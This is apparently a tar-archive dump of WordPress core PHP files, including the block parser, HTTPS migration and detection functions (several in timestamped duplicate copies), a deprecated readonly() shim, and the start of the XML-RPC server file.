return $this->output;
}
/**
* Processes the next token from the input document
* and returns whether to proceed eating more tokens
*
* This is the "next step" function that essentially
* takes a token as its input and decides what to do
* with that token before descending deeper into a
* nested block tree or continuing along the document
* or breaking out of a level of nesting.
*
* @internal
* @since 5.0.0
* @return bool
*/
public function proceed() {
$next_token = $this->next_token();
list( $token_type, $block_name, $attrs, $start_offset, $token_length ) = $next_token;
$stack_depth = count( $this->stack );
// we may have some HTML soup before the next block.
$leading_html_start = $start_offset > $this->offset ? $this->offset : null;
switch ( $token_type ) {
case 'no-more-tokens':
// if not in a block then flush output.
if ( 0 === $stack_depth ) {
$this->add_freeform();
return false;
}
/*
* Otherwise we have a problem
* This is an error
*
* we have options
* - treat it all as freeform text
* - assume an implicit closer (easiest when not nesting)
*/
// for the easy case we'll assume an implicit closer.
if ( 1 === $stack_depth ) {
$this->add_block_from_stack();
return false;
}
/*
* for the nested case where it's more difficult we'll
* have to assume that multiple closers are missing
* and so we'll collapse the whole stack piecewise
*/
while ( 0 < count( $this->stack ) ) {
$this->add_block_from_stack();
}
return false;
case 'void-block':
/*
* easy case is if we stumbled upon a void block
* in the top-level of the document
*/
if ( 0 === $stack_depth ) {
if ( isset( $leading_html_start ) ) {
$this->output[] = (array) $this->freeform(
substr(
$this->document,
$leading_html_start,
$start_offset - $leading_html_start
)
);
}
$this->output[] = (array) new WP_Block_Parser_Block( $block_name, $attrs, array(), '', array() );
$this->offset = $start_offset + $token_length;
return true;
}
// otherwise we found an inner block.
$this->add_inner_block(
new WP_Block_Parser_Block( $block_name, $attrs, array(), '', array() ),
$start_offset,
$token_length
);
$this->offset = $start_offset + $token_length;
return true;
case 'block-opener':
// track all newly-opened blocks on the stack.
array_push(
$this->stack,
new WP_Block_Parser_Frame(
new WP_Block_Parser_Block( $block_name, $attrs, array(), '', array() ),
$start_offset,
$token_length,
$start_offset + $token_length,
$leading_html_start
)
);
$this->offset = $start_offset + $token_length;
return true;
case 'block-closer':
/*
* if we're missing an opener we're in trouble
* This is an error
*/
if ( 0 === $stack_depth ) {
/*
* we have options
* - assume an implicit opener
* - assume _this_ is the opener
* - give up and close out the document
*/
$this->add_freeform();
return false;
}
// if we're not nesting then this is easy - close the block.
if ( 1 === $stack_depth ) {
$this->add_block_from_stack( $start_offset );
$this->offset = $start_offset + $token_length;
return true;
}
/*
* otherwise we're nested and we have to close out the current
* block and add it as a new innerBlock to the parent
*/
$stack_top = array_pop( $this->stack );
$html = substr( $this->document, $stack_top->prev_offset, $start_offset - $stack_top->prev_offset );
$stack_top->block->innerHTML .= $html;
$stack_top->block->innerContent[] = $html;
$stack_top->prev_offset = $start_offset + $token_length;
$this->add_inner_block(
$stack_top->block,
$stack_top->token_start,
$stack_top->token_length,
$start_offset + $token_length
);
$this->offset = $start_offset + $token_length;
return true;
default:
// This is an error.
$this->add_freeform();
return false;
}
}
/**
* Scans the document from where we last left off
* and finds the next valid token to parse if it exists
*
* Returns the type of the find: kind of find, block information, attributes
*
* @internal
* @since 5.0.0
* @since 4.6.1 fixed a bug in attribute parsing which caused catastrophic backtracking on invalid block comments
* @return array
*/
public function next_token() {
$matches = null;
/*
* aye the magic
* we're using a single RegExp to tokenize the block comment delimiters
* we're also using a trick here because the only difference between a
* block opener and a block closer is the leading `/` before `wp:` (and
* a closer has no attributes). we can trap them both and process the
* match back in PHP to see which one it was.
*/
$has_match = preg_match(
'/<!--\s+(?P<closer>\/)?wp:(?P<namespace>[a-z][a-z0-9_-]*\/)?(?P<name>[a-z][a-z0-9_-]*)\s+(?P<attrs>{(?:(?:[^}]+|}+(?=})|(?!}\s+\/?-->).)*+)?}\s+)?(?P<void>\/)?-->/s',
$this->document,
$matches,
PREG_OFFSET_CAPTURE,
$this->offset
);
// if we get here we probably have catastrophic backtracking or out-of-memory in the PCRE.
if ( false === $has_match ) {
return array( 'no-more-tokens', null, null, null, null );
}
// we have no more tokens.
if ( 0 === $has_match ) {
return array( 'no-more-tokens', null, null, null, null );
}
list( $match, $started_at ) = $matches[0];
$length = strlen( $match );
$is_closer = isset( $matches['closer'] ) && -1 !== $matches['closer'][1];
$is_void = isset( $matches['void'] ) && -1 !== $matches['void'][1];
$namespace = $matches['namespace'];
$namespace = ( isset( $namespace ) && -1 !== $namespace[1] ) ? $namespace[0] : 'core/';
$name = $namespace . $matches['name'][0];
$has_attrs = isset( $matches['attrs'] ) && -1 !== $matches['attrs'][1];
/*
* Fun fact! It's not trivial in PHP to create "an empty associative array" since all arrays
* are associative arrays. If we use `array()` we get a JSON `[]`
*/
$attrs = $has_attrs
? json_decode( $matches['attrs'][0], /* as-associative */ true )
: array();
/*
* This state isn't allowed
* This is an error
*/
if ( $is_closer && ( $is_void || $has_attrs ) ) {
// we can ignore them since they don't hurt anything.
}
if ( $is_void ) {
return array( 'void-block', $name, $attrs, $started_at, $length );
}
if ( $is_closer ) {
return array( 'block-closer', $name, null, $started_at, $length );
}
return array( 'block-opener', $name, $attrs, $started_at, $length );
}
/**
* Returns a new block object for freeform HTML
*
* @internal
* @since 5.0.0
*
* @param string $inner_html HTML content of block.
* @return WP_Block_Parser_Block freeform block object.
*/
public function freeform( $inner_html ) {
return new WP_Block_Parser_Block( null, array(), array(), $inner_html, array( $inner_html ) );
}
/**
* Pushes a length of text from the input document
* to the output list as a freeform block.
*
* @internal
* @since 5.0.0
* @param null $length how many bytes of document text to output.
*/
public function add_freeform( $length = null ) {
$length = $length ? $length : strlen( $this->document ) - $this->offset;
if ( 0 === $length ) {
return;
}
$this->output[] = (array) $this->freeform( substr( $this->document, $this->offset, $length ) );
}
/**
* Given a block structure from memory pushes
* a new block to the output list.
*
* @internal
* @since 5.0.0
* @param WP_Block_Parser_Block $block The block to add to the output.
* @param int $token_start Byte offset into the document where the first token for the block starts.
* @param int $token_length Byte length of entire block from start of opening token to end of closing token.
* @param int|null $last_offset Last byte offset into document if continuing form earlier output.
*/
public function add_inner_block( WP_Block_Parser_Block $block, $token_start, $token_length, $last_offset = null ) {
$parent = $this->stack[ count( $this->stack ) - 1 ];
$parent->block->innerBlocks[] = (array) $block;
$html = substr( $this->document, $parent->prev_offset, $token_start - $parent->prev_offset );
if ( ! empty( $html ) ) {
$parent->block->innerHTML .= $html;
$parent->block->innerContent[] = $html;
}
$parent->block->innerContent[] = null;
$parent->prev_offset = $last_offset ? $last_offset : $token_start + $token_length;
}
/**
* Pushes the top block from the parsing stack to the output list.
*
* @internal
* @since 5.0.0
* @param int|null $end_offset byte offset into document for where we should stop sending text output as HTML.
*/
public function add_block_from_stack( $end_offset = null ) {
$stack_top = array_pop( $this->stack );
$prev_offset = $stack_top->prev_offset;
$html = isset( $end_offset )
? substr( $this->document, $prev_offset, $end_offset - $prev_offset )
: substr( $this->document, $prev_offset );
if ( ! empty( $html ) ) {
$stack_top->block->innerHTML .= $html;
$stack_top->block->innerContent[] = $html;
}
if ( isset( $stack_top->leading_html_start ) ) {
$this->output[] = (array) $this->freeform(
substr(
$this->document,
$stack_top->leading_html_start,
$stack_top->token_start - $stack_top->leading_html_start
)
);
}
$this->output[] = (array) $stack_top->block;
}
}
/**
* WP_Block_Parser_Block class.
*
* Required for backward compatibility in WordPress Core.
*/
require_once __DIR__ . '/class-wp-block-parser-block.php';
/**
* WP_Block_Parser_Frame class.
*
* Required for backward compatibility in WordPress Core.
*/
require_once __DIR__ . '/class-wp-block-parser-frame.php';
https-migration-20260605082053-20260621203053.php 0000666 00000011205 15224151221 0013345 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605165221.php 0000666 00000011205 15224151221 0011767 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
readonly-20260604224133.php 0000666 00000002345 15224151221 0010455 0 ustar 00 <?php
/**
* Conditionally declares a `readonly()` function, which was renamed
* to `wp_readonly()` in WordPress 5.9.0.
*
* In order to avoid PHP parser errors, this function was extracted
* to this separate file and is only included conditionally on PHP < 8.1.
*
* Including this file on PHP >= 8.1 results in a fatal error.
*
* @package WordPress
* @since 5.9.0
*/
/**
* Outputs the HTML readonly attribute.
*
* Compares the first two arguments and if identical marks as readonly.
*
* This function is deprecated, and cannot be used on PHP >= 8.1.
*
* @since 4.9.0
* @deprecated 5.9.0 Use wp_readonly() introduced in 5.9.0.
*
* @see wp_readonly()
*
* @param mixed $readonly_value One of the values to compare.
* @param mixed $current Optional. The other value to compare if not just true.
* Default true.
* @param bool $display Optional. Whether to echo or just return the string.
* Default true.
* @return string HTML attribute or empty string.
*/
function readonly( $readonly_value, $current = true, $display = true ) {
_deprecated_function( __FUNCTION__, '5.9.0', 'wp_readonly()' );
return wp_readonly( $readonly_value, $current, $display );
}
class.wp-styles-20260621171432.php 0000666 00000000522 15224151221 0011710 0 ustar 00 <?php
/**
* Dependencies API: WP_Styles class
*
* This file is deprecated, use 'wp-includes/class-wp-styles.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-styles.php' );
/** WP_Styles class */
require_once ABSPATH . WPINC . '/class-wp-styles.php';
https-detection-20260606100517-20260621081102-20260621180936.php 0000666 00000013341 15224151221 0014724 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605164841.php 0000666 00000013341 15224151221 0011766 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605104304-20260621081211-20260621135748.php 0000666 00000011205 15224151221 0014733 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-xmlrpc-server.php 0000666 00000644627 15224151221 0011637 0 ustar 00 <?php
/**
* XML-RPC protocol support for WordPress.
*
* @package WordPress
* @subpackage Publishing
*/
/**
* WordPress XMLRPC server implementation.
*
* Implements compatibility for Blogger API, MetaWeblog API, MovableType, and
* pingback. Additional WordPress API for managing comments, pages, posts,
* options, etc.
*
* As of WordPress 3.5.0, XML-RPC is enabled by default. It can be disabled
* via the {@see 'xmlrpc_enabled'} filter found in wp_xmlrpc_server::set_is_enabled().
*
* @since 1.5.0
*
